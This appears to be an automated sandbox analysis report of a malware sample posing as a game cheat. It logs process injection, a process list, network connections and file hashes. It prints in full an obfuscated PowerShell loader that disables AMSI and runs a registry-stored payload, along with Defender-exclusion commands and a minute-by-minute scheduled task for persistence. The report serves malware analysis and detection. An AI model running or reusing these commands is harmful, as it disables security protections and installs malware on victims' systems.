PID 836 wrote to memory of 1308 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 836 wrote to memory of 1316 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 836 wrote to memory of 1352 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 648 wrote to memory of 2416 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 836 wrote to memory of 1440 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 836 wrote to memory of 1456 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 836 wrote to memory of 1544 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 836 wrote to memory of 1556 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 836 wrote to memory of 1616 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 836 wrote to memory of 1660 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 836 wrote to memory of 1752 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 836 wrote to memory of 1792 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 836 wrote to memory of 1804 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 648 wrote to memory of 4796 N/A C:\Windows\system32\lsass.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 648 wrote to memory of 4796 N/A C:\Windows\system32\lsass.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 648 wrote to memory of 4796 N/A C:\Windows\system32\lsass.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 648 wrote to memory of 4796 N/A C:\Windows\system32\lsass.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 648 wrote to memory of 4796 N/A C:\Windows\system32\lsass.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 648 wrote to memory of 4796 N/A C:\Windows\system32\lsass.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 648 wrote to memory of 4796 N/A C:\Windows\system32\lsass.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 648 wrote to memory of 4796 N/A C:\Windows\system32\lsass.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 648 wrote to memory of 4796 N/A C:\Windows\system32\lsass.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 648 wrote to memory of 4796 N/A C:\Windows\system32\lsass.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 648 wrote to memory of 4796 N/A C:\Windows\system32\lsass.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 648 wrote to memory of 4796 N/A C:\Windows\system32\lsass.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 836 wrote to memory of 1848 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 836 wrote to memory of 1896 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 836 wrote to memory of 1988 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\spoolsv.exe
PID 836 wrote to memory of 1604 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 836 wrote to memory of 2104 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 648 wrote to memory of 1604 N/A C:\Windows\system32\lsass.exe c:\windows\system32\svchost.exe
PID 836 wrote to memory of 2276 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 836 wrote to memory of 2292 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 836 wrote to memory of 2300 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 836 wrote to memory of 2336 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 836 wrote to memory of 2416 N/A C:\Windows\System32\dllhost.exe C:\Windows\sysmon.exe
PID 836 wrote to memory of 2428 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 836 wrote to memory of 2516 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k dcomlaunch -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s gpsvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Schedule

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s nsi

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s EventSystem

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Themes

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s UserManager

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s SENS

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s NlaSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k appmodel -s StateRepository

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s CryptSvc

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s WpnService

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Browser

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

c:\windows\system32\sihost.exe

sihost.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc

c:\windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s CDPSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\ApplicationFrameHost.exe

C:\Windows\system32\ApplicationFrameHost.exe -Embedding

C:\Windows\System32\InstallAgent.exe

C:\Windows\System32\InstallAgent.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe

C:\Users\Admin\AppData\Local\Temp\$77-Loader.exe

"C:\Users\Admin\AppData\Local\Temp\$77-Loader.exe"

C:\Users\Admin\$77-Cheat.exe

"C:\Users\Admin\$77-Cheat.exe"

C:\Users\Admin\Install.exe

"C:\Users\Admin\Install.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:yOaBhuzIbjQE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QFlvYIURSrHqZq,[Parameter(Position=1)][Type]$GrpjwAxuar)$EKuAQFbTWoJ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+'e'+'d'+'D'+'e'+'l'+'e'+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+'oryM'+'o'+'du'+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+'y'+'De'+[Char](108)+''+[Char](101)+''+'g'+'ate'+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+',Sea'+[Char](108)+''+[Char](101)+'d,'+[Char](65)+''+'n'+''+'s'+'i'+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+'s'+',A'+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$EKuAQFbTWoJ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+[Char](108)+''+'N'+'am'+'e'+''+[Char](44)+''+[Char](72)+'i'+'d'+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$QFlvYIURSrHqZq).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+'i'+'me,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$EKuAQFbTWoJ.DefineMethod(''+[Char](73)+''+'n'+''+'v'+''+[Char](111)+'k'+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c'+','+''+'H'+'i'+[Char](100)+''+'e'+''+'B'+''+'y'+''+'S'+''+[Char](105)+''+'g'+''+','+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+[Char](44)+'V'+[Char](105)+''+'r'+''+[Char](116)+'u'+[Char](97)+'l',$GrpjwAxuar,$QFlvYIURSrHqZq).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+','+'M'+'a'+''+'n'+'ag'+'e'+''+'d'+'');Write-Output $EKuAQFbTWoJ.CreateType();}$XVRSxPlDALPJe=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t'+[Char](46)+'W'+[Char](105)+''+'n'+''+[Char](51)+''+'2'+''+'.'+''+[Char](85)+''+'n'+''+[Char](115)+'a'+[Char](102)+''+[Char](101)+'N'+[Char](97)+'t'+[Char](105)+'v'+[Char](101)+''+[Char](77)+'eth'+'o'+''+'d'+''+[Char](115)+'');$kQWPfWNqJCiwjl=$XVRSxPlDALPJe.GetMethod(''+'G'+'e'+[Char](116)+''+'P'+''+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+'ddr'+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'ub'+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](116)+''+'a'+''+'t'+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HaHqMCsvRGUekKqmbdt=yOaBhuzIbjQE @([String])([IntPtr]);$wOJNFNFFIubFMeQgGhMWzT=yOaBhuzIbjQE @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$yIyoCjEFkZS=$XVRSxPlDALPJe.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+''+[Char](101)+''+'H'+''+[Char](97)+''+'n'+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object]('ker'+'n'+''+[Char](101)+''+'l'+''+[Char](51)+'2'+'.'+'d'+[Char](108)+''+[Char](108)+'')));$WxRnGOMotLZvbc=$kQWPfWNqJCiwjl.Invoke($Null,@([Object]$yIyoCjEFkZS,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+'y'+[Char](65)+'')));$NuJsWykqWqUzYWDVp=$kQWPfWNqJCiwjl.Invoke($Null,@([Object]$yIyoCjEFkZS,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+'u'+''+[Char](97)+''+'l'+'Pr'+'o'+''+[Char](116)+'e'+'c'+'t')));$OEfxrFD=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WxRnGOMotLZvbc,$HaHqMCsvRGUekKqmbdt).Invoke(''+[Char](97)+''+'m'+''+'s'+''+'i'+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$uDfehtpZJhWlQROpe=$kQWPfWNqJCiwjl.Invoke($Null,@([Object]$OEfxrFD,[Object]('A'+'m'+'s'+[Char](105)+''+'S'+''+'c'+''+'a'+''+[Char](110)+''+'B'+''+'u'+'f'+[Char](102)+''+[Char](101)+'r')));$xLrvaodTLf=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NuJsWykqWqUzYWDVp,$wOJNFNFFIubFMeQgGhMWzT).Invoke($uDfehtpZJhWlQROpe,[uint32]8,4,[ref]$xLrvaodTLf);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$uDfehtpZJhWlQROpe,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NuJsWykqWqUzYWDVp,$wOJNFNFFIubFMeQgGhMWzT).Invoke($uDfehtpZJhWlQROpe,[uint32]8,0x20,[ref]$xLrvaodTLf);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+[Char](115)+''+[Char](116)+''+'a'+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{011127df-81ba-495a-825e-6194c78fc50f}

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\$77-Cheat.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-Cheat.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\$77-Powershell.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-Powershell.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-Powershell" /tr "C:\Users\Admin\$77-Powershell.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\$77-Powershell.exe

C:\Users\Admin\$77-Powershell.exe

C:\Users\Admin\$77-Powershell.exe

C:\Users\Admin\$77-Powershell.exe

C:\Users\Admin\$77-Powershell.exe

C:\Users\Admin\$77-Powershell.exe

C:\Users\Admin\$77-Powershell.exe

C:\Users\Admin\$77-Powershell.exe

C:\Users\Admin\$77-Powershell.exe

C:\Users\Admin\$77-Powershell.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 uk2.localto.net udp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
US 8.8.8.8:53 169.117.168.52.in-addr.arpa udp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp

Files

memory/2156-0-0x00007FFD2D573000-0x00007FFD2D574000-memory.dmp

memory/2156-1-0x0000000000D00000-0x0000000000D4A000-memory.dmp

C:\Users\Admin\$77-Cheat.exe

MD5 419a7b960bc493733acab7a685e22cf7
SHA1 bfed97bc33a336e2c696e1e1541bce0206d6fabc
SHA256 dae0d531b5e148bbaf889de678b328f1e798b790aac68927526e47acc7459669
SHA512 dc00eebd3a7191f222b8620a52e896d3ecbf8e3381f1b186553c807d3da75e6466b01ff77d7f117af540da6e5da277dd6ac27e7f5aa64fba416c6ce9b736e114

C:\Users\Admin\Install.exe

MD5 b51552b77057c2405f73bbbf9c89234a
SHA1 4793adbba023f90d2d2ad0ec55199c56de815224
SHA256 720e6962d75e37e8b47b160c5b3f60433a341f00abf60041630116b26858fbb0
SHA512 564f4104e6e398eeef8acc7ce7cab694b6eebbe4233b7cb359829242b949dc7c5bf124a550a4d0402eb7da19b8bec6c1f6753563b17a8ae36fb639be595b8d66

memory/4228-13-0x0000000000DB0000-0x0000000000DCC000-memory.dmp

memory/4228-14-0x00007FFD2D570000-0x00007FFD2DF5C000-memory.dmp

memory/4052-19-0x00000234BA640000-0x00000234BA662000-memory.dmp

memory/4052-22-0x00000234BA700000-0x00000234BA776000-memory.dmp

C:\Windows\Temp\__PSScriptPolicyTest_4itvmb5z.x1p.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4052-40-0x00000234BAA80000-0x00000234BAAAA000-memory.dmp

memory/4052-41-0x00007FFD4A190000-0x00007FFD4A36B000-memory.dmp

memory/4052-42-0x00007FFD4A0D0000-0x00007FFD4A17E000-memory.dmp

memory/836-46-0x0000000140000000-0x0000000140008000-memory.dmp

memory/836-45-0x0000000140000000-0x0000000140008000-memory.dmp

memory/836-44-0x0000000140000000-0x0000000140008000-memory.dmp

memory/836-43-0x0000000140000000-0x0000000140008000-memory.dmp

memory/836-51-0x0000000140000000-0x0000000140008000-memory.dmp

memory/836-52-0x00007FFD4A190000-0x00007FFD4A36B000-memory.dmp

memory/836-53-0x00007FFD4A0D0000-0x00007FFD4A17E000-memory.dmp

memory/836-54-0x0000000140000000-0x0000000140008000-memory.dmp

memory/560-57-0x0000019F35970000-0x0000019F35995000-memory.dmp

memory/560-58-0x0000019F359A0000-0x0000019F359CA000-memory.dmp

memory/560-59-0x0000019F359A0000-0x0000019F359CA000-memory.dmp

memory/560-64-0x0000019F359A0000-0x0000019F359CA000-memory.dmp

memory/560-65-0x00007FFD0A220000-0x00007FFD0A230000-memory.dmp

memory/648-75-0x00007FFD0A220000-0x00007FFD0A230000-memory.dmp

memory/648-74-0x000002664BB70000-0x000002664BB9A000-memory.dmp

memory/648-69-0x000002664BB70000-0x000002664BB9A000-memory.dmp

memory/4228-79-0x00007FFD2D570000-0x00007FFD2DF5C000-memory.dmp

memory/748-86-0x00007FFD0A220000-0x00007FFD0A230000-memory.dmp

memory/748-85-0x000002D67EC80000-0x000002D67ECAA000-memory.dmp

memory/748-80-0x000002D67EC80000-0x000002D67ECAA000-memory.dmp

memory/912-96-0x00007FFD0A220000-0x00007FFD0A230000-memory.dmp

memory/992-106-0x00007FFD0A220000-0x00007FFD0A230000-memory.dmp

memory/992-105-0x0000021382FE0000-0x000002138300A000-memory.dmp

memory/992-100-0x0000021382FE0000-0x000002138300A000-memory.dmp

memory/912-95-0x000001FE20930000-0x000001FE2095A000-memory.dmp

memory/912-90-0x000001FE20930000-0x000001FE2095A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ea8eb4c93b171a1bd8f78c2f8d3c5f91
SHA1 c974b8f55f8e9523e09efcca15e98bbc3fdaecf9
SHA256 c28a2524ce1c2ae80134f7706c2635ebab867c3f72a765c379e52a39f6b33eaa
SHA512 842566248d47165c75a0c8a0c68a5c4a86b53dcaa847bc87e68f009a806cd985845976ae2a0268e7951f580f1cb850398a73e3c18be18d142619b23987b73878

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 79a90804f71b7f45c837901023b22592
SHA1 bf4d21b6d1c8031ef240366f6ca2bcd322957f72
SHA256 88e9e98395b654259b1690cd798b6a639bcaad33ebb07b9dc9e854ed7e06d47b
SHA512 4215d4b319e10f150e59417940ee0393a316d866f73a98257bcffc9f7a55cae5beb97a8a1d3b019c787d9ae672d2d867f902ca4df0c6dcc222d670f9979e770a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 42ce88b3109c1b6104d1bf5b29c4b9eb
SHA1 5e358f733c73b5b22dc5f81105e98b06e69ecbeb
SHA256 7f7a7615eacb3a9cce3e8cbe828996d8b1e374c4a7dd60c4bd3dd4d60a219542
SHA512 84b8333d0230f92a4c91e06599619e1547a453f4d14d753918649022b10e93bf1d1f893266bb9e94d24409e630fe867281821791ba8caa7a028aea85536c1ecc

memory/4228-947-0x00007FFD2D570000-0x00007FFD2DF5C000-memory.dmp

memory/4228-948-0x00007FFD2D570000-0x00007FFD2DF5C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-Powershell.exe.log

MD5 16c5fce5f7230eea11598ec11ed42862
SHA1 75392d4824706090f5e8907eee1059349c927600
SHA256 87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151
SHA512 153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc

C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

MD5 7320c8b5a181c9ee5f85e0a36192c648
SHA1 89cf5f91eca64dd8c88d6eaf50ac5709b31a0be2
SHA256 09b6651a4820ccd24d6438874d9b0e55c527e54da1a7cf60c239f0e5b20ea45f
SHA512 0d02d547ddff83a6249853e549f836cce5d7393df76169483304c1ed846d63b248d6d2eb56b258d6e3a27d405774133b87b38a5e31af6bb11b72cbacde43356e